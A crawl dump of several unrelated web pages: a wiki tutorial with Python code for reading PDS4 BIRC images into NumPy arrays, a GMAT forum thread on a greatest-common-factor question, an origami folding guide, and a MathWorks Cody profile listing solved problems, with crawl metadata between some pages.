msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cf2ab53c-666e-476e-89a0-e0ba7592b2c8>\",\"WARC-Concurrent-To\":\"<urn:uuid:9b5ba5ce-12d9-4f5e-a459-0320ff77598a>\",\"WARC-IP-Address\":\"104.96.217.125\",\"WARC-Target-URI\":\"https://in.mathworks.com/matlabcentral/profile/authors/14644008?detail=all\",\"WARC-Payload-Digest\":\"sha1:6GOCNA23TCDCYK4C5B7V72C5VK5O4S67\",\"WARC-Block-Digest\":\"sha1:CVDBQHRXPTWRV2PAJ35WP7M47QUVHQGI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964362891.54_warc_CC-MAIN-20211203151849-20211203181849-00064.warc.gz\"}"}
https://metanumbers.com/107107
[ "# 107107 (number)\n\n107,107 (one hundred seven thousand one hundred seven) is an odd six-digits composite number following 107106 and preceding 107108. In scientific notation, it is written as 1.07107 × 105. The sum of its digits is 16. It has a total of 4 prime factors and 16 positive divisors. There are 76,320 positive integers (up to 107107) that are relatively prime to 107107.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Odd\n• Number length 6\n• Sum of Digits 16\n• Digital Root 7\n\n## Name\n\nShort name 107 thousand 107 one hundred seven thousand one hundred seven\n\n## Notation\n\nScientific notation 1.07107 × 105 107.107 × 103\n\n## Prime Factorization of 107107\n\nPrime Factorization 7 × 11 × 13 × 107\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 4 Total number of distinct prime factors Ω(n) 4 Total number of prime factors rad(n) 107107 Product of the distinct prime numbers λ(n) 1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 107,107 is 7 × 11 × 13 × 107. 
Since it has a total of 4 prime factors, 107,107 is a composite number.\n\n## Divisors of 107107\n\n16 divisors\n\n Even divisors 0 16 8 8\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 16 Total number of the positive divisors of n σ(n) 145152 Sum of all the positive divisors of n s(n) 38045 Sum of the proper positive divisors of n A(n) 9072 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 327.272 Returns the nth root of the product of n divisors H(n) 11.8063 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 107,107 can be divided by 16 positive divisors (out of which 0 are even, and 16 are odd). The sum of these divisors (counting 107,107) is 145,152, the average is 9,072.\n\n## Other Arithmetic Functions (n = 107107)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 76320 Total number of positive integers not greater than n that are coprime to n λ(n) 3180 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 10176 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 76,320 positive integers (less than 107,107) that are coprime with 107,107. 
And there are approximately 10,176 prime numbers less than or equal to 107,107.\n\n## Divisibility of 107107\n\n m n mod m 2 3 4 5 6 7 8 9 1 1 3 2 1 0 3 7\n\nThe number 107,107 is divisible by 7.\n\n## Classification of 107107\n\n• Arithmetic\n• Deficient\n\n• Polite\n\n• Square Free\n\n### Other numbers\n\n• LucasCarmichael\n\n## Base conversion (107107)\n\nBase System Value\n2 Binary 11010001001100011\n3 Ternary 12102220221\n4 Quaternary 122021203\n5 Quinary 11411412\n6 Senary 2143511\n8 Octal 321143\n10 Decimal 107107\n12 Duodecimal 51b97\n20 Vigesimal d7f7\n36 Base36 2an7\n\n## Basic calculations (n = 107107)\n\n### Multiplication\n\nn×y\n n×2 214214 321321 428428 535535\n\n### Division\n\nn÷y\n n÷2 53553.5 35702.3 26776.8 21421.4\n\n### Exponentiation\n\nny\n n2 11471909449 1228721805354043 131604706406055483601 14095785289033384682052307\n\n### Nth Root\n\ny√n\n 2√n 327.272 47.4904 18.0907 10.1383\n\n## 107107 as geometric shapes\n\n### Circle\n\n Diameter 214214 672973 3.60401e+10\n\n### Sphere\n\n Volume 5.14686e+15 1.4416e+11 672973\n\n### Square\n\nLength = n\n Perimeter 428428 1.14719e+10 151472\n\n### Cube\n\nLength = n\n Surface area 6.88315e+10 1.22872e+15 185515\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 321321 4.96748e+09 92757.4\n\n### Triangular Pyramid\n\nLength = n\n Surface area 1.98699e+10 1.44806e+14 87452.5\n\n## Cryptographic Hash Functions\n\nmd5 c39287d312d814d143e0a4d1051ffc91 784dbca81c93bb7cd57749a764d4be9e281f5a53 6d56d1763079f9ffbd233f182a18ac63d1bb433ca53b2fe4ea0d078c272f6e9a be3b747ce58a3410196682fa025b2d5af2360d9e73bb58ecade2f40049c2e3e11541bb04a3108b88eb6e67e49951d5dca6dedf2bd0c3f43e756179bda1e72976 03820e0ebdcb85358809d2feda139e83cba4ffa1" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.60157067,"math_prob":0.97097677,"size":4616,"snap":"2021-43-2021-49","text_gpt3_token_len":1626,"char_repetition_ratio":0.120338246,"word_repetition_ratio":0.03660322,"special_character_ratio":0.45732236,"punctuation_ratio":0.07544757,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.996066,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-23T04:36:08Z\",\"WARC-Record-ID\":\"<urn:uuid:b3409f20-54bf-4adc-8df8-db53d1e141ce>\",\"Content-Length\":\"40227\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f45f9702-8a03-4d3f-aa5b-86b6c48ed706>\",\"WARC-Concurrent-To\":\"<urn:uuid:0de75a44-d490-4526-86e1-adccc47afe09>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/107107\",\"WARC-Payload-Digest\":\"sha1:HOQYONYO5QCKHSB7R7CHARNZ7DGK2DNA\",\"WARC-Block-Digest\":\"sha1:7PELVYX7DY35Z6CPJSSX2PYTUGWK2VFM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585561.4_warc_CC-MAIN-20211023033857-20211023063857-00071.warc.gz\"}"}
https://www.pcibex.net/wiki/penncontroller-gettable-filter/
[ "# PennController.GetTable().filterGlobal Commands\n\n`PennController.GetTable( tablename ).filter( \"column\" , \"match\" )`\n\nor `PennController.GetTable( tablename ).filter( \"column\" , /match/ )`\n\nor `PennController.GetTable( tablename ).filter( function )`\n\nReturns a filtered version of the table, containing only rows whose specified column’s value is a match.\n\nIf you use a string then the column’s value must match the text exactly. Alternatively, you can use a regular expression to test the column’s value. You can also use a function that will take each row as an argument and should return `true` to keep the row or `false` to exclude it.\n\nYou can use several `filter`s in chain.\n\nExample:\n\n```Template(\n.filter( row => row.Item > 0 ) // 'Item' should be greater than 0, and\n.filter( \"ButtonText\" , /second/ ) // 'ButtonText' should contain 'second'\n,\nrow => newTrial( \"button trial\" ,\nnewButton(\"test button\", row.ButtonText)\n.print()\n.wait()\n)\n.log( \"Item\" , row.Item )\n.log( \"Text\" , row.ButtonText )\n);\n```\n\nGenerates only one trial from a subset of the table spreadsheet.csv: first we only consider rows where the value in the Item column is a number greater than 0 (this is practically ineffective, for both rows in spreadsheet.csv already satisfy this condition) and we further consider only rows among those rows where the value of the ButtonText column is a text containing the string second (only the second row satisfies this condition)." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.67396504,"math_prob":0.7046261,"size":1405,"snap":"2021-04-2021-17","text_gpt3_token_len":327,"char_repetition_ratio":0.11848679,"word_repetition_ratio":0.018099548,"special_character_ratio":0.24412811,"punctuation_ratio":0.15564202,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96432245,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-24T03:18:13Z\",\"WARC-Record-ID\":\"<urn:uuid:7d87aa76-3198-47f0-8c57-db0482aa3baf>\",\"Content-Length\":\"46457\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:950addd0-62f0-42f9-add4-b7d6697c40c0>\",\"WARC-Concurrent-To\":\"<urn:uuid:627a116a-ab29-469d-98d7-19ea66cdd1ec>\",\"WARC-IP-Address\":\"45.33.65.35\",\"WARC-Target-URI\":\"https://www.pcibex.net/wiki/penncontroller-gettable-filter/\",\"WARC-Payload-Digest\":\"sha1:7WCGLCAMVFGGB3EXFRZA6U7HQUQH2Y4E\",\"WARC-Block-Digest\":\"sha1:S4LFKQCXRYFYKZQFXXDDF2FVOTYTIM6N\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703544403.51_warc_CC-MAIN-20210124013637-20210124043637-00537.warc.gz\"}"}
https://www.downtoscuba.com/boyles-law-in-scuba-diving/
[ "", null, "One of the main concepts of physics explained in scuba diving is Boyle’s Law. At a glance, it is a simple expression of a pressure and volume relationship of gases. It can, however, get complex. For the purpose of this article, we are going to keep it simple. What exactly is the relationship between Boyle’s Law and scuba diving? And how does it affect us as scuba divers?\n\n## Boyle’s Law and Scuba Diving\n\nEven though Richard Towneley and Henry Power first noted the relationship between pressure and volume in the 17th century, it was Robert Boyle that confirmed their findings by conducting experiments. He reduced the volume of a closed gas container using mercury and noted the proportional relationship or pressure and volume.\n\nWe don’t have Mercury available. So what about a balloon? We have a closed container of gas. Now if we were to pull this balloon underwater, the water pressure increases linearly with depth. That means our flexible, closed system of gas (balloon) will decrease in volume the deeper we pull it.\n\nThis looks like this:\n\nDepth\n\nSurface\n\n10m\n\n20m\n\n30m\n\n40m\n\nPressure\n\n1 bar\n\n2 bar\n\n3 bar\n\n4 bar\n\n5 bar\n\nVolume\n\n1\n\n1/2\n\n1/3\n\n1/4\n\n1/5\n\nDensity\n\n1x\n\n2x\n\n3x\n\n4x\n\n5x\n\n## What is Boyle’s Law Formula\n\nNow that we know that we are talking about a law that describes the volume of a fixed amount of gas in a closed container when the pressure changes, we know we need pressure and volume as parameters in our formula.\n\nSo that leaves us with starting volume & starting pressure and leaves us with ending volume & ending pressure. 
Therefore this is what the Boyle’s Law formula is:\n\nP1V1 = P2V2\n\nWhere P1 is first pressure, V1 first volume and after the change we have P2 for the second pressure and V2 for the second volume.\n\nLet’s apply this formula to a dive where we take a balloon with us.\n\nThe balloon at the surface is 2.3 litres in volume and we are at the surface, so 1 bar of absolute pressure.\n\nWe want to dive to 32 meters with this balloon. Therefore, according to the Boyle’s law formula, we have:\n\nP1V1 = P2V2 and can therefore use V2 = P1V1 / P2\n\n(1*2.3) / 4.2 = 0.5476\n\nThis means that the new volume of the balloon at 32 meters depth would be about 0.55 liters.\n\nSince we don’t need to know exact volumes in scuba diving this is overkill. What we do need to understand is that the relationship of gas volume exposed to pressure is proportional. What does this mean for us as divers? For example, we need to add more physical air in order to achieve neutral buoyancy deeper. Furthermore, we cannot hold our breath and ascend. Knowing these facts is why you need to be certified in order to scuba dive.\n\nAs a result of gas volume decreasing with increased pressure, we also notice a gas’s density increase. Increased density in breathing gases leads to faster air consumption rates at depth." ]
[ null, "https://www.downtoscuba.com/wp-content/uploads/2020/03/what-is-boyles-law-696x464.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9388005,"math_prob":0.9515393,"size":2856,"snap":"2020-45-2020-50","text_gpt3_token_len":688,"char_repetition_ratio":0.13113604,"word_repetition_ratio":0.0,"special_character_ratio":0.23284313,"punctuation_ratio":0.087030716,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97440827,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-28T20:53:56Z\",\"WARC-Record-ID\":\"<urn:uuid:f79dda8f-c8cd-4f86-8730-47f17c23c187>\",\"Content-Length\":\"177682\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8f809ad0-067e-40fa-9bf9-bc65ea9b5a56>\",\"WARC-Concurrent-To\":\"<urn:uuid:b3bd76c8-8a4d-46e0-bbcf-be3de3e4d15a>\",\"WARC-IP-Address\":\"173.236.190.126\",\"WARC-Target-URI\":\"https://www.downtoscuba.com/boyles-law-in-scuba-diving/\",\"WARC-Payload-Digest\":\"sha1:EJ2GUMWEBU7SRY2NPDR3SFQGXU4I7R7J\",\"WARC-Block-Digest\":\"sha1:OQNMFCIN5IEB5JHCVOMF3Z3X367I5V7J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107900860.51_warc_CC-MAIN-20201028191655-20201028221655-00427.warc.gz\"}"}
https://ww2.mathworks.cn/matlabcentral/answers/352695-about-decimation-in-dwt
[ "16 views (last 30 days)\nAlexander Voznesensky on 14 Aug 2017\nEdited: Wayne King on 15 Aug 2017\nHi! I'm studying DWT by this link http://slideplayer.com/slide/4998644/. And I have 2 question (slide on 18.07):\n1. We should do decimation anyway: after LP-filter and after HP-filter. After LP-filter it's ok, but after HP-filter we will have an aliasing? Am I right? For ex: We have a signal with f1=100 Hz and f2=400 Hz. Fs=1000 Hz. After LP (0-250 Hz) we have subband with f1=100 Hz, Fs= 500. It's ok (f1<Fs/2). After HP (250-500 Hz) we have subband with f2=400 Hz, Fs= 500. It's not ok. Aliasing (f2>Fs/2)?\n2. How we can use only 2 filters in DWT? I don't understand, why the filters change their cut-off frequency when we use decimated signal? For ex: \"Therefore, if you calculated, say, a low-pass filter with a cutoff frequency of 10 MHz at a sampling frequency of 100 MHz, and then samples taken at a frequency of 10 GHz were applied to the input of this filter, the filter cutoff frequency would be 100 times larger, i.e., 1 GHz .\"\n\nWayne King on 14 Aug 2017\nEdited: Wayne King on 14 Aug 2017\nHi Alexander,\n1. Yes, you are correct that the downsampling causes aliasing (or can cause aliasing). However, the analysis filters and synthesis filters in the wavelet transform are designed in such a way that any aliasing is canceled upon reconstruction.\n2. You are only using two filters because you are using the so-called pyramid algorithm. You can think of the equivalent filters in terms of successive convolutions, but you should keep in the mind the so called Noble identities from multirate signal processing. That allows you to see the effect of interchanging downsampling with filtering (or on the synthesis, the effect of interchanging upsampling with filtering). 
Read up on the Noble identities, for one example, if you lowpass filter with the scaling filter, G(f), and then downsample by two followed by filtering with the wavelet filter, H(f) that is equivalent to the second-level wavelet coefficients (prior to decimating those by two). Schematically, that is X(f) -> G(f) -> downsample by two -> H(f). The noble identities will tell you that is equivalent to X(f) -> G(f)H(2f) -> downsample by two so the equivalent filter for the second-level wavelet coefficients is G(f)H(2f). Now let's look at that filter in MATLAB.\nN = 64;\n[G,H] = wfilters('sym4');\nGdft = fft(G,N);\nHdft = fft(H,N);\nH2 = Hdft(1+mod(2*(0:N-1),N));\nH2 = Gdft.*H2;\nNow let's plot Hdft (1st-level wavelet filter response) and H2 (second-level wavelet filter response)\nf = 0:1/N:1/2;\nplot(f,abs(Hdft(1:N/2+1)));\nhold on;\nplot(f,abs(H2(1:N/2+1)),'r');\nlegend('First Level Wavelet','Second Level Wavelet');\nxlim([0 1/2]);\ngrid on;\nxlabel('Cycles/Sample');\n\n#### 1 Comment\n\nAlexander Voznesensky on 14 Aug 2017\nThank you! I was trying to understand what you said. Here is the plot. I see, that we have a scaling effect. For ex, f=100 Hz (after deimation) corresponds to f=200 Hz (before decimation). I supose, this is the reason of using only 2 filters. We should multiply new frequences with factor M*level_number and then match them to original f-axis where we have filter's amplitude-frequency response. Formally this is understandable, but... Looks like a trick. Could you recommend some stuff about it?", null, "Wayne King on 15 Aug 2017\nEdited: Wayne King on 15 Aug 2017\nHi Alexander,\nI don't think there is a trick here. The filter responses scale as you go down in resolution but that is because the discrete wavelet transform uses L2 normalization so that the L2 norm is preserved. That is good for lots of applications, but not for others. 
For example, in the CWT we (and many others) believe that L1 normalization is better and that is why the CWT in MATLAB from 16b on uses L1 normalization.\nOne thing to keep in mind is that the downsampling at each level turns essentially half-band signals into full-band signals, so we can say that (this is an approximation) the scaling coefficients at level 1 capture aspects of the data in the frequency interval (-1/4,1/4) while the wavelet coefficients capture information in (-1/2,-1/4) union (1/4,1/2). After downsampling both of these become full-band signals so they both have content over (-1/2, 1/2), but while the scaling coefficients maintain the frequency order, the wavelet coefficients actually map the frequencies in (1/4, 1/2) in reverse order. So a frequency in (1/4,1/2) gets mapped essentially to 2*(1/2-f) where f is the original frequency. For example:\n% for the classic orthonormal DWT use a power of two and dwtmode 'per'\ndwtmode('per');\nn = 0:255;\nx = cos(2*pi*7/16*n); % frequency is 7/16 cycles/sample almost at Nyquist\nf = -1/2:1/256:1/2-1/256;\nplot(f,fftshift(abs(fft(x))))\nIf you zoom in, you see the frequency is 7/16 as expected. Now we expect that the wavelet coefficients at level one will map this to approximately 2*(1/2-7/16)\n[A,D] = dwt(x,'sym4');\nfnew = -1/2:1/128:1/2-1/128;\nplot(fnew,fftshift(abs(fft(D))))\nNow the frequency is 1/8 as expected.\nI think this is covered in a lot of detail in Don Percival and Andrew Walden's textbook on wavelets in time series analysis, \"Wavelet Methods for Time Series Analysis\"." ]
[ null, "https://www.mathworks.com/matlabcentral/answers/uploaded_files/186358/image.jpeg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92826533,"math_prob":0.9464847,"size":1727,"snap":"2020-24-2020-29","text_gpt3_token_len":474,"char_repetition_ratio":0.11201393,"word_repetition_ratio":0.0,"special_character_ratio":0.2866242,"punctuation_ratio":0.10242587,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9916923,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-14T08:05:03Z\",\"WARC-Record-ID\":\"<urn:uuid:471ce88b-0032-4d36-a7cd-08b00e7c9f5b>\",\"Content-Length\":\"127368\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5e7af662-9789-4219-89b0-7f1808b969b0>\",\"WARC-Concurrent-To\":\"<urn:uuid:2496175e-b55b-474a-8fdb-eb93441ec79b>\",\"WARC-IP-Address\":\"104.96.236.188\",\"WARC-Target-URI\":\"https://ww2.mathworks.cn/matlabcentral/answers/352695-about-decimation-in-dwt\",\"WARC-Payload-Digest\":\"sha1:Q73ODIY3TPAOQ4VPD4WTNWQHWIJCI37T\",\"WARC-Block-Digest\":\"sha1:QMOKFHDP5GSHWRMXNHOUZC3U4YUZYVQW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593657149205.56_warc_CC-MAIN-20200714051924-20200714081924-00273.warc.gz\"}"}
https://catalog.lib.kyushu-u.ac.jp/opac_detail_md/?reqCode=frombib&lang=0&amode=MD100000&opkey=&bibid=11792&start=
[ "## <紀要論文>ON THE SIEGEL-TATUZAWA THEOREM FOR A CLASS OF L-FUNCTIONS\n\n作成者 作成者名 所属機関 所属機関名 Graduate School of Information Engineering, Hiroshima University 広島大学大学院工学研究科情報工学専攻 作成者名 所属機関 所属機関名 Graduate School of Mathematics, Nagoya University 名古屋大学大学院多元数理科学研究科 英語 Faculty of Mathematics, Kyushu University 九州大学大学院数理学研究院 2008-03 62 1 201 215 Version of Record restricted access Kyushu Journal of Mathematics || 62(1) || p201-215 http://www2.math.kyushu-u.ac.jp/~kjm/ Kyushu Journal of Mathematics || 62(1) || p201-215 http://www2.math.kyushu-u.ac.jp/~kjm/ Kyushu Journal of Mathematics || 62(1) || p201-215 http://www2.math.kyushu-u.ac.jp/~kjm/ We consider an effective lower bound of the Siegel-Tatuzawa type for general $L$-functions with three standard assumptions. We further assume three hypotheses in this paper that are essential in dev...eloping our argument.Under these assumptions and hypotheses, we prove a theorem of Siegel-Tatuzawa type for general $L$-functions. In particular, we prove such a theorem for symmetric power $L$-functions under certain assumptions.続きを見る\n\n### 詳細\n\nレコードID 11792 査読有 Siegel's zero Tatuzawa's theorem $L$-function 1340-6116 10.2206/kyushujm.62.201 紀要論文 2009.09.25 2018.02.01" ]
http://www.tomhsiung.com/wordpress/tag/regression-equation/
[ "", null, "The Regression Equation\n\nWhen analyzing data, it is essential to first construct a graph of the data. A scatterplot is a graph of data from two quantitative variables of a population. In a scatterplot, we use horizontal axis for the observations of one variable and a vertical axis for the observations of the other variable. Each pair of observations is then plottted as a point. Note: Data from two quantitative variables of a population are called bivariate quantitative data.\n\nTo measure quantitatively how well a line fits teh data, we first consider the errors, e, made in using the line to predict the y-values of the data points. In general, an error, e, is the signed vertical distance from the line to a data point. To decide which line fits the data better, we first compute the sum of the squared errors. Among all lines, the least-squares criterion is that the line having the smallest sum of squared errors is the one that fits the data best. Or, the least-squares criterion is that the line best fits a set of data points is the one having the smallest possible sum of squared errors.\n\nAlthough the least-squares criterion states the property that the regression line for a set of data points must satify, it does not tell us how to find that line. This task is accomplished by Formula 14.1. In preparation, we introduce some notation that will be used throughout our study of regression and correlation.", null, "Note although we have not used Syy in Formula 14.1, we will use it later.\n\nFor a linear regression y = b0 + b1x, y is the depdendent variable and x is the independent variable. However, in the context of regression analysis, we usually call y the response variable and x the predictor variable or explanatory variable (because it is used to predict or explain the values of the response variable).\n\nExtrapolation\n\nSuppose that a scatterplot indicates a linear relationship between two variables. 
Then, within the range of the observed values of the predictor variable, we can reasonably use the regression equation to make predictions for the response variable. However, to do so outside the range, which is called extrapolation, may not be reasonable because the linear relationship between the predictor and response variables may not hold there. To help avoid extrapolation, some researchers include the range of the observed values of the predictor variable with the regression equation.

Outliers and Influential Observations

Recall that an outlier is an observation that lies outside the overall pattern of the data. In the context of regression, an outlier is a data point that lies far from the regression line, relative to the other data points. An outlier can sometimes have a significant effect on a regression analysis. Thus, as usual, we need to identify outliers and remove them from the analysis when appropriate – for example, if we find that an outlier is a measurement or recording error.

We must also watch for influential observations. In regression analysis, an influential observation is a data point whose removal causes the regression equation (and line) to change considerably. A data point separated in the x-direction from the other data points is often an influential observation because the regression line is "pulled" toward such a data point without counteraction by other data points. If an influential observation is due to a measurement or recording error, or if for some other reason it clearly does not belong in the data set, it can be removed without further consideration. However, if no explanation for the influential observation is apparent, the decision whether to retain it is often difficult and calls for a judgment by the researcher.

A Warning on the Use of Linear Regression

The idea behind finding a regression line is based on the assumption that the data points are scattered about a line.
Frequently, however, the data points are scattered about a curve instead of a line. One can still compute the values of b0 and b1 to obtain a regression line for these data points. The result, however, will yield an inappropriate fit by a line, when in fact a curve should be used. Therefore, before finding a regression line for a set of data points, draw a scatterplot. If the data points do not appear to be scattered about a line, do not determine a regression line.

The Coefficient of Determination

In general, several methods exist for evaluating the utility of a regression equation for making predictions. One method is to determine the percentage of variation in the observed values of the response variable that is explained by the regression (or predictor variable), as discussed below. To find this percentage, we need to define two measures of variation: 1) the total variation in the observed values of the response variable and 2) the amount of variation in the observed values of the response variable that is explained by the regression.

To measure the total variation in the observed values of the response variable, we use the sum of squared deviations of the observed values of the response variable from the mean of those values. This measure of variation is called the total sum of squares, SST. Thus, SST = Σ(yi − ȳ)². If we divide SST by n − 1, we get the sample variance of the observed values of the response variable. So SST really is a measure of total variation.

To measure the amount of variation in the observed values of the response variable that is explained by the regression, we first look at a particular observed value of the response variable, say, corresponding to the data point (xi, yi). The total variation in the observed values of the response variable is based on the deviation of each observed value from the mean value, yi − ȳ.
Each such deviation can be decomposed into two parts: the deviation explained by the regression line, ŷi − ȳ, and the remaining unexplained deviation, yi − ŷi. Hence the amount of variation (squared deviation) in the observed values of the response variable that is explained by the regression is Σ(ŷi − ȳ)². This measure of variation is called the regression sum of squares, SSR. Thus, SSR = Σ(ŷi − ȳ)².

Using the total sum of squares and the regression sum of squares, we can determine the percentage of variation in the observed values of the response variable that is explained by the regression, namely, SSR/SST. This quantity is called the coefficient of determination and is denoted r². Thus, r² = SSR/SST. Similarly, the deviation not explained by the regression is yi − ŷi, and the amount of variation (squared deviation) in the observed values of the response variable that is not explained by the regression is Σ(yi − ŷi)². This measure of variation is called the error sum of squares, SSE. Thus, SSE = Σ(yi − ŷi)².

In summary, check Definition 14.6. The coefficient of determination, r², is the proportion of variation in the observed values of the response variable explained by the regression. The coefficient of determination always lies between 0 and 1. A value of r² near 0 suggests that the regression equation is not very useful for making predictions, whereas a value of r² near 1 suggests that the regression equation is quite useful for making predictions.

Regression Identity

The total sum of squares equals the regression sum of squares plus the error sum of squares: SST = SSR + SSE. Because of the regression identity, we can also express the coefficient of determination in terms of the total sum of squares and the error sum of squares: r² = SSR/SST = (SST − SSE)/SST = 1 − SSE/SST.
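The three sums of squares and r² can be computed directly from a fitted least-squares line. A minimal sketch in pure Python (the four data points are made up for illustration):

```python
def sums_of_squares(xs, ys):
    """Fit the least-squares line, then decompose total variation into
    SST (total), SSR (explained by the regression), and SSE (unexplained)."""
    n = len(xs)
    xbar, ybar = sum(xs) / n, sum(ys) / n
    sxx = sum((x - xbar) ** 2 for x in xs)
    sxy = sum((x - xbar) * (y - ybar) for x, y in zip(xs, ys))
    b1 = sxy / sxx                      # slope of the sample regression line
    b0 = ybar - b1 * xbar               # y-intercept
    yhat = [b0 + b1 * x for x in xs]    # predicted values
    sst = sum((y - ybar) ** 2 for y in ys)
    ssr = sum((yh - ybar) ** 2 for yh in yhat)
    sse = sum((y - yh) ** 2 for y, yh in zip(ys, yhat))
    return sst, ssr, sse, ssr / sst     # last value is r-squared

# Made-up, roughly linear data
sst, ssr, sse, r2 = sums_of_squares([1, 2, 3, 4], [1.1, 1.9, 3.2, 3.8])
```

For any data set fitted this way, the computed values satisfy SST = SSR + SSE up to rounding, which is exactly the regression identity.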
This formula shows that, when expressed as a percentage, we can also interpret the coefficient of determination as the percentage reduction obtained in the total squared error by using the regression equation instead of the mean, ȳ, to predict the observed values of the response variable.

Correlation and Causation

Two variables may have a high correlation without being causally related. Rather, we can only infer that the two variables have a strong tendency to increase (or decrease) simultaneously and that one variable is a good predictor of the other. Two variables may be strongly correlated because they are both associated with other variables, called lurking variables, that cause the changes in the two variables under consideration.

The Regression Model; Analysis of Residuals

The terminology of conditional distributions, means, and standard deviations is used in general for any predictor variable and response variable; these terms are given in Definition 15.1. Using the terminology presented in Definition 15.1, we can now state the conditions required for applying inferential methods in regression analysis (Assumptions 1-3 for regression inferences).

Note: We refer to the line y = 𝛽0 + 𝛽1x – on which the conditional means of the response variable lie – as the population regression line and to its equation as the population regression equation. Observe that 𝛽0 is the y-intercept of the population regression line and 𝛽1 is its slope. The inferential procedures in regression are robust to moderate violations of Assumptions 1-3 for regression inferences. In other words, the inferential procedures work reasonably well provided the variables under consideration don't violate any of those assumptions too badly.

Estimating the Regression Parameters

Suppose that we are considering two variables, x and y, for which the assumptions for regression inferences are met.
Then there are constants 𝛽0, 𝛽1, and 𝜎 such that, for each value x of the predictor variable, the conditional distribution of the response variable is a normal distribution with mean 𝛽0 + 𝛽1x and standard deviation 𝜎.

Because the parameters 𝛽0, 𝛽1, and 𝜎 are usually unknown, we must estimate them from sample data. We use the y-intercept and slope of a sample regression line as point estimates of the y-intercept and slope, respectively, of the population regression line; that is, we use b0 to estimate 𝛽0 and we use b1 to estimate 𝛽1. We note that b0 is an unbiased estimator of 𝛽0 and that b1 is an unbiased estimator of 𝛽1.

Equivalently, we use a sample regression line to estimate the unknown population regression line. Of course, a sample regression line ordinarily will not be the same as the population regression line, just as a sample mean generally will not equal the population mean.

The statistic used to obtain a point estimate for the common conditional standard deviation 𝜎 is called the standard error of the estimate, computed as se = √(SSE/(n − 2)).

Analysis of Residuals

Now we discuss how to use sample data to decide whether we can reasonably presume that the assumptions for regression inferences are met. We concentrate on Assumptions 1-3. The method for checking Assumptions 1-3 relies on an analysis of the errors made by using the regression equation to predict the observed values of the response variable, that is, on the differences between the observed and predicted values of the response variable. Each such difference is called a residual, generically denoted e. Thus,

Residual = ei = yi − ŷi

We can show that the sum of the residuals is always 0, which, in turn, implies that ē = 0. Consequently, the standard error of the estimate is essentially the same as the standard deviation of the residuals (however, the exact standard deviation of the residuals is obtained by dividing by n − 1 instead of n − 2).
Thus, the standard error of the estimate is sometimes called the residual standard deviation.

We can analyze the residuals to decide whether Assumptions 1-3 for regression inferences are met because those assumptions can be translated into conditions on the residuals. To show how, let's consider a sample of data points obtained from two variables that satisfy the assumptions for regression inferences.

In light of Assumption 1, the data points should be scattered about the (sample) regression line, which means that the residuals should be scattered about the x-axis. In light of Assumption 2, the variation of the observed values of the response variable should remain approximately constant from one value of the predictor variable to the next, which means the residuals should fall roughly in a horizontal band. In light of Assumption 3, for each value of the predictor variable, the distribution of the corresponding observed values of the response variable should be approximately bell shaped, which implies that the horizontal band should be centered and symmetric about the x-axis.

Furthermore, considering all four regression assumptions simultaneously, we can regard the residuals as independent observations of a variable having a normal distribution with mean 0 and standard deviation 𝜎. Thus a normal probability plot of the residuals should be roughly linear.

A plot of the residuals against the observed values of the predictor variable, which for brevity we call a residual plot, provides approximately the same information as does a scatterplot of the data points. However, a residual plot makes spotting patterns such as curvature and nonconstant standard deviation easier.

